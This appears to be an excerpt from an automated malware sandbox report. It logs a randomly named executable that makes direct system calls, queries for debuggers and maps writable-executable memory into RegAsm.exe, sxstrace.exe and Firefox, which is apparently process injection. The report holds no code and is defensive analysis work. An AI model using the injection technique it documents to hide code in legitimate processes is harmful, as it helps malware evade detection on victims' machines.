Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000863000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.2147975967.0000022FF9BBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sxstrace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior